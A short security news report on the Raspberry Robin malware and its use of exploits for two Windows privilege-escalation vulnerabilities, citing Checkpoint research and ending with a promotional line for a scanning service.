The malware, first spotted in September 2021, has been targeting organizations in the technology and manufacturing industries. It uses cmd.exe to read and execute a file stored on the infected external drive and employs msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.
Checkpoint researchers have detailed the evolution of Raspberry Robin, noting that its authors have integrated these new exploits, indicating access to an exploit seller or the malware authors’ development of the exploits. The malware has been updated with new features and supports new evasion capabilities, changing its communication method and lateral movement to avoid detection.
One of the vulnerabilities, CVE-2023-36802, is a Type Confusion issue in Microsoft Streaming Service Proxy, allowing local attackers to escalate privileges to SYSTEM. This vulnerability was disclosed on September 12, but had been exploited in the wild before becoming a zero-day. The analysis of samples before October revealed that the operators also used an exploit for CVE-2023-29360, which was publicly disclosed in June and employed by Raspberry Robin in August.
The report concludes that Raspberry Robin operators likely purchased the 1-day exploits from an exploit developer, based on several observations, including the use of the exploits as an external 64-bit executable and the lack of heavy obfuscation and control flow flattening in the exploits compared to Raspberry Robin’s main component.
Source: Securityaffairs
To mitigate potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net or you can try your self using check.website.